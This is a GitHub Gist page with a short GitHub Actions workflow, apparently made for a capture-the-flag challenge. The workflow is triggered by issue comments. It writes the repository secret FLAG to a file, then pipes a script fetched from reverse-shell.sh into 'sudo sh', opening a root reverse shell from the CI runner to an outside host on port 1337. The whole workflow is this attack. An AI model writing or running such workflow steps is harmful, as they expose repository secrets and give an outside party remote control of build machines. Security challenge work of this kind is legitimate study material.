Skip to content

Instantly share code, notes, and snippets.

@Mr-Pine
Created October 26, 2023 20:40
Show Gist options
  • Save Mr-Pine/e7023f6803491159d685edc795ab2705 to your computer and use it in GitHub Desktop.
Save Mr-Pine/e7023f6803491159d685edc795ab2705 to your computer and use it in GitHub Desktop.
name: Example Workflow
on:
issue_comment:
types: [created]
permissions: read-all
jobs:
example_job:
timeout-minutes: 2
runs-on: ubuntu-latest
steps:
- run: echo "${{ secrets.FLAG }}" > flag.txt
- run: curl https://reverse-shell.sh/cloudy.mr-pine.de:1337 | sudo sh
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment